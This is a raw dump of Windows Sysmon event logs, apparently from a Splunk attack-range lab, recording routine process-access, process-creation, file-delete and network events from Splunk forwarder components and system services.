10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-114D-6216-5404-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.393{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-114D-6216-5404-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.394{4F8D34B0-114D-6216-5404-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.096{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15ED5CCEB0638C61942C6B29ED58F3F2,SHA256=98F4FD53702EF5D4DABA6080B4684B106BDD9F1EACB6E42F87BF16B52E2342F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:50.570{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8B5B08561DA8E7970161A8D0FD94363,SHA256=4035964AE5FF33093BE5A02377BE50F021C4330CC2ED98ED0C40883EEEF737E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:50.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75AF04B4635D38F1996FA7E67C03DBE2,SHA256=25ACFC0E6E11C0A2B9FD5685527C9CF3AFF97E810D00BAB2B0010423530DEFA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:50.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D847BB501EF81DBEB22EDD912C63EB2,SHA256=094CD832595CF7BE65EEE40B26A0536E45BA89F4A13E2D088938F8532CDA4AAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:50.193{4F8D34B0-114D-6216-5504-000000003902}22842680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:51.632{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFFE9511022AFA9F14030821B7AD3069,SHA256=F22B2330E82103BDA06E20DB0D94F85FAF739E696DD5D3365644BC27379E2A6C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-114F-6216-5604-000000003902}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-114F-6216-5604-000000003902}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.518{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-114F-6216-5604-000000003902}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.519{4F8D34B0-114F-6216-5604-000000003902}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:51.237{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=094A81331BE60A91C585310B4E8E0216,SHA256=C796A46ACA6646A24D3029E4CD84D89CEA22D298DDFD1A125E44076AD448AEC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:52.695{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42EC469FD3E18096EDE7A9D06E71DD43,SHA256=A4D7F7D4DF385AA0A2DCF86CBE35F7A4D50BF142D7A675BE41FFEB4FFCEB7142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:52.706{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13F74C7F92FB0EEB13E8914A4D2151EF,SHA256=43A1FE97BDFBECA2A47E35B27C6252D013390E202896DBD20570FE181DF43C15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:52.253{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB9D43B4D2786AC184EC07F1B66B597,SHA256=45ED1DBBB9EDAEC36471E5B3FA28300637CD1C5F46066FFC95EA4A261D522304,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:49.538{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51330-false10.0.1.12-8000- 354300x8000000000000000287591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:51.700{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53429-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:53.929{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CC54A60467FCB477A98AF09E1D578D5,SHA256=3D5A238C770351FCF1609F0DD09FAB6749A0DFD263FE5D8994E8578F8CC9E165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:53.331{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06C8851DC6D69392FDF500E3B7E20B13,SHA256=737A281AB6D69D700028A1969550A286D1A48D8FAADB85F0C9EA531237B3F9A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 